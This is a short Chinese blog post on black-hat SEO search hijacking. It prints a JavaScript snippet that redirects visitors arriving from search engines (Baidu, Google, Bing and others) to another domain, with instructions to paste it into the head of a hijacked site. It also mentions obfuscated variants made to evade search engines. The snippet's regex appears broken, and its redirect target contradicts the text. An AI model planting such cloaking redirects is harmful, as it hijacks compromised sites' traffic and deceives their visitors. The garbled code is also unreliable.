黑帽SEO劫持手法简要分析[附代码]

搜索引擎劫持简称搜索劫持，其实就是从搜索引擎来的流量自动跳转到指定的网页。可以通过未经用户授权，自动修改第三方搜索引擎结果的软件实现，通常这类程序会在第三方搜索引擎的结果中添加自己的广告或加入网站链接获取流量等。也可以通过如下搜索引擎劫持代码实现（属于黑帽SEO需要掌握被劫持网站权限，建议不要使用）。

以上是百度百科对搜索引擎劫持的解释。实战派的不要太去在意这些理论，没多大用处。

这里简要分析搜索引擎劫持中的JS劫持。我在这简要说一种，说多了，新手容易蒙圈。在这里我以一个网站举例说明，认为是广告的直接关掉页面。当一个用户在百度里面搜索一个关键词“口罩机”，你会看到a.com这个域名的网站，你点击进去他会自动跳转到www.b.com这个域名上去。但是当你直接输入域名a.com时候，你直接打开a.com这个网站的内容。这就是JS劫持。

是怎么实现的呢？我把最简单的JS代码粘贴出来。

<script type="text/javascript">

var regexp=/.(sogou|soso|baidu|google|youdao|yahoo|bing|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(.[a-z0-9-]+){1,2}//ig;

var where =document.referrer;

if(regexp.test(where))

{

window.location.href='http://www.a.com/'

}

</script>

你把此段代码复制到需要劫持的网站</head>之前就可以上述功能，这JS代码为了躲避搜索引擎的识别会有很多变种，应用的技术有字符串拼接拆分、字符串编码转化、加密等，但基本都是上面原理的变种，通过判断来路来给用户展现不同的页面。